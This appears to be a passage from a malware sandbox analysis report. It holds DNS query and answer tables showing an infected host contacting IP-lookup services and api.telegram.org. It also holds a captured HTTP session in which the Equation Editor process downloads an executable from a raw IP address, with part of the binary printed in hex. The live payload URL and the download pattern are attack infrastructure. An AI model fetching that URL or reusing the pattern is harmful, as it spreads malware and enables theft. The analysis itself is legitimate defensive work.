Oct 30, 2024 08:25:19.886425018 CET	192.168.2.22	8.8.8.8	0x3a74	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:19.895354033 CET	192.168.2.22	8.8.8.8	0x814d	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:20.754029989 CET	192.168.2.22	8.8.8.8	0x5dc1	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:21.581365108 CET	192.168.2.22	8.8.8.8	0x6298	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:21.591655016 CET	192.168.2.22	8.8.8.8	0xc503	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:27.227332115 CET	192.168.2.22	8.8.8.8	0x359	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:28.004789114 CET	192.168.2.22	8.8.8.8	0xc1db	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:28.016516924 CET	192.168.2.22	8.8.8.8	0x870e	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:29.930043936 CET	192.168.2.22	8.8.8.8	0xdcc	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:30.720957041 CET	192.168.2.22	8.8.8.8	0xd786	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:30.729911089 CET	192.168.2.22	8.8.8.8	0xb9f5	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:33.725078106 CET	192.168.2.22	8.8.8.8	0x5f9	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.650343895 CET	192.168.2.22	8.8.8.8	0x3d62	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.657597065 CET	192.168.2.22	8.8.8.8	0x3d62	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.702517986 CET	192.168.2.22	8.8.8.8	0x3f11	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:37.403094053 CET	192.168.2.22	8.8.8.8	0x8c5e	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:38.456196070 CET	192.168.2.22	8.8.8.8	0x5391	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:38.489801884 CET	192.168.2.22	8.8.8.8	0xc66a	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:39.594027996 CET	192.168.2.22	8.8.8.8	0x37a0	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:40.743726969 CET	192.168.2.22	8.8.8.8	0xf44a	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:41.389600992 CET	192.168.2.22	8.8.8.8	0xeca7	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:42.616375923 CET	192.168.2.22	8.8.8.8	0xd330	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:44.892189980 CET	192.168.2.22	8.8.8.8	0x1d26	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 30, 2024 08:25:12.540170908 CET	8.8.8.8	192.168.2.22	0x8f3b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:12.540170908 CET	8.8.8.8	192.168.2.22	0x8f3b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:12.540170908 CET	8.8.8.8	192.168.2.22	0x8f3b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:12.540170908 CET	8.8.8.8	192.168.2.22	0x8f3b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:12.540170908 CET	8.8.8.8	192.168.2.22	0x8f3b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:12.540170908 CET	8.8.8.8	192.168.2.22	0x8f3b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:12.578273058 CET	8.8.8.8	192.168.2.22	0x3802	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:12.578273058 CET	8.8.8.8	192.168.2.22	0x3802	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:12.578273058 CET	8.8.8.8	192.168.2.22	0x3802	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:12.578273058 CET	8.8.8.8	192.168.2.22	0x3802	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:12.578273058 CET	8.8.8.8	192.168.2.22	0x3802	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:12.578273058 CET	8.8.8.8	192.168.2.22	0x3802	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:16.688657999 CET	8.8.8.8	192.168.2.22	0x78f4	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:16.688657999 CET	8.8.8.8	192.168.2.22	0x78f4	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:19.893296003 CET	8.8.8.8	192.168.2.22	0x3a74	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:19.893296003 CET	8.8.8.8	192.168.2.22	0x3a74	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:19.893296003 CET	8.8.8.8	192.168.2.22	0x3a74	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:19.893296003 CET	8.8.8.8	192.168.2.22	0x3a74	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:19.893296003 CET	8.8.8.8	192.168.2.22	0x3a74	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:19.893296003 CET	8.8.8.8	192.168.2.22	0x3a74	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:19.902776957 CET	8.8.8.8	192.168.2.22	0x814d	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:19.902776957 CET	8.8.8.8	192.168.2.22	0x814d	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:19.902776957 CET	8.8.8.8	192.168.2.22	0x814d	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:19.902776957 CET	8.8.8.8	192.168.2.22	0x814d	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:19.902776957 CET	8.8.8.8	192.168.2.22	0x814d	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:19.902776957 CET	8.8.8.8	192.168.2.22	0x814d	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:20.761974096 CET	8.8.8.8	192.168.2.22	0x5dc1	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:20.761974096 CET	8.8.8.8	192.168.2.22	0x5dc1	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:21.588953972 CET	8.8.8.8	192.168.2.22	0x6298	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:21.588953972 CET	8.8.8.8	192.168.2.22	0x6298	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:21.588953972 CET	8.8.8.8	192.168.2.22	0x6298	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:21.588953972 CET	8.8.8.8	192.168.2.22	0x6298	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:21.588953972 CET	8.8.8.8	192.168.2.22	0x6298	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:21.588953972 CET	8.8.8.8	192.168.2.22	0x6298	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:21.598676920 CET	8.8.8.8	192.168.2.22	0xc503	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:21.598676920 CET	8.8.8.8	192.168.2.22	0xc503	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:21.598676920 CET	8.8.8.8	192.168.2.22	0xc503	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:21.598676920 CET	8.8.8.8	192.168.2.22	0xc503	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:21.598676920 CET	8.8.8.8	192.168.2.22	0xc503	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:21.598676920 CET	8.8.8.8	192.168.2.22	0xc503	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:27.238435030 CET	8.8.8.8	192.168.2.22	0x359	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:27.238435030 CET	8.8.8.8	192.168.2.22	0x359	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:28.014523983 CET	8.8.8.8	192.168.2.22	0xc1db	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:28.014523983 CET	8.8.8.8	192.168.2.22	0xc1db	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:28.014523983 CET	8.8.8.8	192.168.2.22	0xc1db	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:28.014523983 CET	8.8.8.8	192.168.2.22	0xc1db	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:28.014523983 CET	8.8.8.8	192.168.2.22	0xc1db	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:28.014523983 CET	8.8.8.8	192.168.2.22	0xc1db	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:28.026369095 CET	8.8.8.8	192.168.2.22	0x870e	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:28.026369095 CET	8.8.8.8	192.168.2.22	0x870e	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:28.026369095 CET	8.8.8.8	192.168.2.22	0x870e	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:28.026369095 CET	8.8.8.8	192.168.2.22	0x870e	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:28.026369095 CET	8.8.8.8	192.168.2.22	0x870e	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:28.026369095 CET	8.8.8.8	192.168.2.22	0x870e	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:29.941814899 CET	8.8.8.8	192.168.2.22	0xdcc	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:29.941814899 CET	8.8.8.8	192.168.2.22	0xdcc	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:30.727693081 CET	8.8.8.8	192.168.2.22	0xd786	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:30.727693081 CET	8.8.8.8	192.168.2.22	0xd786	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:30.727693081 CET	8.8.8.8	192.168.2.22	0xd786	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:30.727693081 CET	8.8.8.8	192.168.2.22	0xd786	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:30.727693081 CET	8.8.8.8	192.168.2.22	0xd786	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:30.727693081 CET	8.8.8.8	192.168.2.22	0xd786	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:30.736855984 CET	8.8.8.8	192.168.2.22	0xb9f5	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:30.736855984 CET	8.8.8.8	192.168.2.22	0xb9f5	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:30.736855984 CET	8.8.8.8	192.168.2.22	0xb9f5	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:30.736855984 CET	8.8.8.8	192.168.2.22	0xb9f5	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:30.736855984 CET	8.8.8.8	192.168.2.22	0xb9f5	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:30.736855984 CET	8.8.8.8	192.168.2.22	0xb9f5	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:33.732656002 CET	8.8.8.8	192.168.2.22	0x5f9	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:33.732656002 CET	8.8.8.8	192.168.2.22	0x5f9	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.657399893 CET	8.8.8.8	192.168.2.22	0x3d62	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:34.657399893 CET	8.8.8.8	192.168.2.22	0x3d62	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.657399893 CET	8.8.8.8	192.168.2.22	0x3d62	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.657399893 CET	8.8.8.8	192.168.2.22	0x3d62	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.657399893 CET	8.8.8.8	192.168.2.22	0x3d62	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.657399893 CET	8.8.8.8	192.168.2.22	0x3d62	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.666486025 CET	8.8.8.8	192.168.2.22	0x3d62	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:34.666486025 CET	8.8.8.8	192.168.2.22	0x3d62	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.666486025 CET	8.8.8.8	192.168.2.22	0x3d62	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.666486025 CET	8.8.8.8	192.168.2.22	0x3d62	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.666486025 CET	8.8.8.8	192.168.2.22	0x3d62	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.666486025 CET	8.8.8.8	192.168.2.22	0x3d62	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.709511995 CET	8.8.8.8	192.168.2.22	0x3f11	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:34.709511995 CET	8.8.8.8	192.168.2.22	0x3f11	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.709511995 CET	8.8.8.8	192.168.2.22	0x3f11	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.709511995 CET	8.8.8.8	192.168.2.22	0x3f11	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.709511995 CET	8.8.8.8	192.168.2.22	0x3f11	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:34.709511995 CET	8.8.8.8	192.168.2.22	0x3f11	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:37.410660982 CET	8.8.8.8	192.168.2.22	0x8c5e	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:37.410660982 CET	8.8.8.8	192.168.2.22	0x8c5e	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:38.463363886 CET	8.8.8.8	192.168.2.22	0x5391	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:38.463363886 CET	8.8.8.8	192.168.2.22	0x5391	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:38.463363886 CET	8.8.8.8	192.168.2.22	0x5391	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:38.463363886 CET	8.8.8.8	192.168.2.22	0x5391	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:38.463363886 CET	8.8.8.8	192.168.2.22	0x5391	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:38.463363886 CET	8.8.8.8	192.168.2.22	0x5391	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:38.497565985 CET	8.8.8.8	192.168.2.22	0xc66a	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:38.497565985 CET	8.8.8.8	192.168.2.22	0xc66a	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:38.497565985 CET	8.8.8.8	192.168.2.22	0xc66a	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:38.497565985 CET	8.8.8.8	192.168.2.22	0xc66a	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:38.497565985 CET	8.8.8.8	192.168.2.22	0xc66a	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:38.497565985 CET	8.8.8.8	192.168.2.22	0xc66a	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:39.601342916 CET	8.8.8.8	192.168.2.22	0x37a0	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:39.601342916 CET	8.8.8.8	192.168.2.22	0x37a0	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:40.751247883 CET	8.8.8.8	192.168.2.22	0xf44a	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:40.751247883 CET	8.8.8.8	192.168.2.22	0xf44a	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:40.751247883 CET	8.8.8.8	192.168.2.22	0xf44a	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:40.751247883 CET	8.8.8.8	192.168.2.22	0xf44a	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:40.751247883 CET	8.8.8.8	192.168.2.22	0xf44a	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:40.751247883 CET	8.8.8.8	192.168.2.22	0xf44a	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:41.396950960 CET	8.8.8.8	192.168.2.22	0xeca7	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 30, 2024 08:25:41.396950960 CET	8.8.8.8	192.168.2.22	0xeca7	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:41.396950960 CET	8.8.8.8	192.168.2.22	0xeca7	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:41.396950960 CET	8.8.8.8	192.168.2.22	0xeca7	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:41.396950960 CET	8.8.8.8	192.168.2.22	0xeca7	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:41.396950960 CET	8.8.8.8	192.168.2.22	0xeca7	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:42.627844095 CET	8.8.8.8	192.168.2.22	0xd330	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:42.627844095 CET	8.8.8.8	192.168.2.22	0xd330	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 30, 2024 08:25:44.899302959 CET	8.8.8.8	192.168.2.22	0x1d26	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

87.120.84.38

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	87.120.84.38	80	3304	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 08:25:02.790302038 CET	322	OUT	GET /txt/pKL9HXcZosWfPt1.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 87.120.84.38 Connection: Keep-Alive
Oct 30, 2024 08:25:03.736092091 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Wed, 30 Oct 2024 07:25:03 GMT Content-Type: application/x-msdos-program Content-Length: 755712 Connection: keep-alive Last-Modified: Wed, 30 Oct 2024 01:58:38 GMT ETag: "b8800-625a80a540932" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 86 91 21 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6c 0b 00 00 1a 00 00 00 00 00 00 a2 8a 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 8a 0b 00 4f 00 00 00 00 a0 0b 00 20 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL!g0l @ @PO H.textj l `.rsrc n@@.reloc@BHqg0((+0((+0((+0((+0((+0((+0((+0((+0((+0(( +0
Oct 30, 2024 08:25:03.736114025 CET	1236	IN	Data Raw: 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 28 21 00 00 0a 0a 2b 00 06 2a 00 13 30 07 00 21 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 0e 06 28 22 00 00 0a 0a 2b 00 06 Data Ascii: ((!+0!(("+vs~#0J~~#($,rps%z~,~~#(&(0},~(+a
Oct 30, 2024 08:25:03.736125946 CET	1236	IN	Data Raw: 00 0a 6f 4b 00 00 0a 00 02 7b 06 00 00 04 28 01 00 00 2b 02 fe 06 2e 00 00 06 73 4d 00 00 0a 6f 4e 00 00 0a 00 02 7b 14 00 00 04 03 6f 39 00 00 0a 00 02 7b 11 00 00 04 17 6f 48 00 00 0a 00 2a 00 00 13 30 03 00 48 00 00 00 08 00 00 11 00 02 7b 15 Data Ascii: oK{(+.sMoN{o9{oH0H{oOoP,-{oOoQoRoSoT}+0P{oJoU{oJ(+~p%-&~osW%p(+(+oZ
Oct 30, 2024 08:25:03.736439943 CET	636	IN	Data Raw: 00 00 0a 72 b5 01 00 70 6f 6d 00 00 0a 6f 6e 00 00 0a 28 62 00 00 0a 13 08 11 08 39 9c 00 00 00 00 11 06 6f 6c 00 00 0a 72 b5 01 00 70 6f 6d 00 00 0a 6f 6e 00 00 0a 13 09 11 06 6f 6c 00 00 0a 72 bf 01 00 70 6f 6d 00 00 0a 6f 6e 00 00 0a 13 0a 72 Data Ascii: rpomon(b9olrpomonolrpomonrpso`%rQp%%rWp%%r]p(eolrpomopoqor%/os:u4,ot+*
